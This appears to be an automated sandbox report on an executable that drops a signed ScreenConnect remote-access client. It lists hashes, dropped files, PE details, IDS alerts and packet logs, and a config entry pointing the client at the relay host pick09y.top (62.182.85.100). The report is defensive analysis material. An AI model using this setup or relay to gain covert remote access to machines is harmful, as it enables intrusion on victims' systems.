                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.862223562830496
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):147976
                                                                                                                                                                              Entropy (8bit):5.699150757460175
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:0aNYcT51/FXvMVNWfCXq9ymdrpErpErpXm2o9HuzhJOvP:0dcfiVITrpErpErpXmt8vOvP
                                                                                                                                                                              MD5:B7DEB98212080D0214AD779A9446FF09
                                                                                                                                                                              SHA1:05FAD5E8F0131FB5DD9D6EFA8F879E8FA684B569
                                                                                                                                                                              SHA-256:C8DC03F64AA8D794D5A763B4260C18967267B7E9C55E1BE8D0ECCF5107C9D49A
                                                                                                                                                                              SHA-512:7F93A5DF3A29312518CE188DBD72B987FD5B99DB58C4E8ACC7FF9677907B1B74F2126A6D4FD1DEF4FE136649D5690EB3EBFE739D57299C0A6E4E5EA7DB1C74E2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                              Entropy (8bit):3.463057265798253
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                              MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                              SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                              SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                              SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                              Entropy (8bit):5.363907225770245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                              MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                              SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                              SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                              SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):556
                                                                                                                                                                              Entropy (8bit):5.042876098095699
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+LCDzv/vXbAa3xT:2dL9hK6E46YPpz3vH
                                                                                                                                                                              MD5:4AC6371353CC59FE5C6E3319405BE7D9
                                                                                                                                                                              SHA1:14CB34BF608AC9B2F4574B67816A219BA953787D
                                                                                                                                                                              SHA-256:F0D7263254C0E2454667E262C923DE0458B26B7FFB6942E89DB544E1020A67B3
                                                                                                                                                                              SHA-512:4D1547FB53DD176906F2C0E1809E23E4D6E93BA6153BA4939179F383F26A45BC94314C88C66390340228D838034227562C16766C0722F5744731354E05508EBD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2017%3a04%3a55</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                              Entropy (8bit):4.421574552833648
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:vSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:6vloTMW+EZMM6DFyu03w
                                                                                                                                                                              MD5:91AF84A906BA27C6FADCB0D43A3915D7
                                                                                                                                                                              SHA1:0010E44619FFD4F97A136BE0E3455DDF99812E83
                                                                                                                                                                              SHA-256:0830B3C722427F893FD2D4B76314B0925AE55D50390F459CB01C35C33E95D0B1
                                                                                                                                                                              SHA-512:A67B53FBBA11F4ACE2524314A70C863D66C8728F482C87026785271758475FEA1B8ED649442F5AC57C2CC3B3B4AE2B5FA3C6369C04E51E64B251ABC92C251F12
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ.N+71...............................................................................................................................................................................................................................................................................................................................................VY.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):6.5156988686305
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:pzPO97QouM.exe
                                                                                                                                                                              File size:83'336 bytes
                                                                                                                                                                              MD5:47891cf8a43a19e066fe70e812982c98
                                                                                                                                                                              SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
                                                                                                                                                                              SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
                                                                                                                                                                              SHA512:f4294182583c2ad7697afa3ad5a2ef75adde64e72b31fb3eb120bc37cac81e4b16f98fb5e0ffdab193770ca92c54c4b0aeebd70fc7148ef49f07bf9d05a01c2c
                                                                                                                                                                              SSDEEP:1536:RoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD70xDP:LenkyfPAwiMq0RqRfbaxZJYYDa
                                                                                                                                                                              TLSH:F4835B43B5D18875E9720E3118B1D9B4593FBE110EA48EAB3398427E0F351D19E3AE7B
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                              Entrypoint:0x401489
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                              File Version Major:5
                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                              Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                              Error Number:0
                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                              • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                                                                                                              Subject Chain
                                                                                                                                                                              • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                              Version:3
                                                                                                                                                                              Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                              Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                              Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                              Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                              Instruction
                                                                                                                                                                              call 00007F64D0EFB68Ah
                                                                                                                                                                              jmp 00007F64D0EFB13Fh
                                                                                                                                                                              push ebp
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              push 00000000h
                                                                                                                                                                              call dword ptr [0040B048h]
                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                              call dword ptr [0040B044h]
                                                                                                                                                                              push C0000409h
                                                                                                                                                                              call dword ptr [0040B04Ch]
                                                                                                                                                                              push eax
                                                                                                                                                                              call dword ptr [0040B050h]
                                                                                                                                                                              pop ebp
                                                                                                                                                                              ret
                                                                                                                                                                              push ebp
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              sub esp, 00000324h
                                                                                                                                                                              push 00000017h
                                                                                                                                                                              call dword ptr [0040B054h]
                                                                                                                                                                              test eax, eax
                                                                                                                                                                              je 00007F64D0EFB2C7h
                                                                                                                                                                              push 00000002h
                                                                                                                                                                              pop ecx
                                                                                                                                                                              int 29h
                                                                                                                                                                              mov dword ptr [004118C0h], eax
                                                                                                                                                                              mov dword ptr [004118BCh], ecx
                                                                                                                                                                              mov dword ptr [004118B8h], edx
                                                                                                                                                                              mov dword ptr [004118B4h], ebx
                                                                                                                                                                              mov dword ptr [004118B0h], esi
                                                                                                                                                                              mov dword ptr [004118ACh], edi
                                                                                                                                                                              mov word ptr [004118D8h], ss
                                                                                                                                                                              mov word ptr [004118CCh], cs
                                                                                                                                                                              mov word ptr [004118A8h], ds
                                                                                                                                                                              mov word ptr [004118A4h], es
                                                                                                                                                                              mov word ptr [004118A0h], fs
                                                                                                                                                                              mov word ptr [0041189Ch], gs
                                                                                                                                                                              pushfd
                                                                                                                                                                              pop dword ptr [004118D0h]
                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                              mov dword ptr [004118C4h], eax
                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                              mov dword ptr [004118C8h], eax
                                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                                              mov dword ptr [004118D4h], eax
                                                                                                                                                                              mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                              mov dword ptr [00411810h], 00010001h
                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2d88
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                              DLLImport
                                                                                                                                                                              KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                              CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-11-07T18:04:28.554147+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549715TCP
                                                                                                                                                                              2024-11-07T18:04:28.988102+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549717TCP
                                                                                                                                                                              2024-11-07T18:04:30.684682+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549721TCP
                                                                                                                                                                              2024-11-07T18:04:35.946315+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549742TCP
                                                                                                                                                                              2024-11-07T18:04:37.828214+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549747TCP
                                                                                                                                                                              2024-11-07T18:04:40.463486+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549757TCP
                                                                                                                                                                              2024-11-07T18:04:42.302808+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549764TCP
                                                                                                                                                                              2024-11-07T18:04:48.101543+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549795TCP
                                                                                                                                                                              2024-11-07T18:04:50.623445+01002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1172.67.182.214443192.168.2.549808TCP
                                                                                                                                                                              2024-11-07T18:05:06.383877+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.549897TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Nov 7, 2024 18:04:18.253901005 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:18.253941059 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:18.254018068 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:18.450709105 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:18.450737953 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:19.102796078 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:19.102915049 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:19.151706934 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:19.151748896 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:19.152091980 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:19.198904991 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:19.534667969 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:19.575335026 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194735050 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194785118 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194818974 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194856882 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194861889 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.194892883 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194942951 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.194976091 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.195002079 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.195008039 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.195019007 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.195063114 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.195077896 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.245795012 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.245822906 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.292658091 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.311686993 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.311743975 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.311774015 CET44349705172.67.182.214192.168.2.5
